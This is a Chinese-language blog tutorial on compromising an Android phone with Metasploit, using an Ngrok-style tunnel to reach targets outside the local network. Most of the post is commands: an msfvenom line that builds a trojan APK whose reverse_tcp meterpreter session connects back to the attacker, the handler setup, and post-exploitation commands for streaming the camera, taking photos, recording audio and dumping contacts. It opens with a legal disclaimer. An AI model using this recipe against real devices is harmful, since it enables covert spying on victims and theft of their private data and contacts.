通過Metasploit+小米球實現內網穿透入侵安卓手機

whathay發表於2021-10-03

一. 前言:

嚴正宣告:本文僅限於技術討論與分享,嚴禁用於非法途徑。

實驗目的:演示如何使用Kali裡的Metasploit控制安卓手機

內網穿透原理:內網穿透相當於先將資料發給伺服器,然後由伺服器發給內網中的我們

 

二. 環境準備

注:具體下載和使用方法我就不講了,百度上都有,講起來太長了

1.kali linux(攻擊方)

2.Ngrok(小米球)

下載linux版本並註冊一個帳號來開通一個免費的隧道,用於接下來的埠對映

3.安卓模擬器(因為博主沒有安卓手機,所以用模擬器)

注:比較推薦用模擬器,因為這個漏洞挺久遠的,所以不支援高版本的手機,目前我測試了7.0以上好像是不行的(至少我沒成功,有成功的歡迎來教教我),靶機我用的是版本為5.1的安卓

 

三. 開始實驗

1. 啟動內網穿透工具Ngrok

命令: ./xiaomiqiu_start.sh(在xiaomiqiu檔案右擊在此開啟終端並輸入此命令)

2.檢視kali的ip

命令:ifconfig

3. 用Metasploit生成載有惡意Payload的Android的apk

命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.121.128 lport=8080 R > what.apk

解釋: lhost=192.168.121.128 (這是Kali的IP)lport=8080 (預設4444,可以自定義,這裡要與Ngrok的相同)

4. 啟動msfconsole,設定模組

命令1:msfconsole

命令2:use exploit/multi/handler

5. 設定payload和監聽

set payload android/meterpreter/reverse_tcp //選擇Payload
set lhost 192.168.121.128  //這裡的地址設定成我們剛才生成木馬的IP地址
set lport 8080      //這裡的埠設定成剛才我們生成木馬所監聽的埠

6. 檢查配置是否正確

命令:options

 

四.攻擊

1. 入侵

命令:exploit或者run

這個時候就監聽就開啟了,然後使用手機安裝剛才生成的病毒檔案(拉檔案就不用演示了吧)

2. 此時手動點選剛才手機中安裝的MainActivity程式圖示(沒有介面)

3.當受害者點選以後便可成功建立攻擊會話

 

五. 攻擊命令

1.開啟攝像頭並錄影

命令:webcam_stream

2.檢視手機系統資訊

命令:sysinfo

3.匯出手機通訊錄

命令:dump_contacts

4.呼叫攝像頭拍照

命令:webcam_snap

5.錄製聲音

命令: record_mic

6.成功建立攻擊會話後可以對受害者手機進行像Linux主機shell一樣對手機進行命令執行操作

 


至此,本次演示結束,其他一些命令我就不一一演示了,有興趣的話可自行藉助help命令或者?給出的使用命令描述進行體驗。

溫馨提示:請不要隨便安裝陌生人的軟體,可能會洩露自己的隱私!

相關文章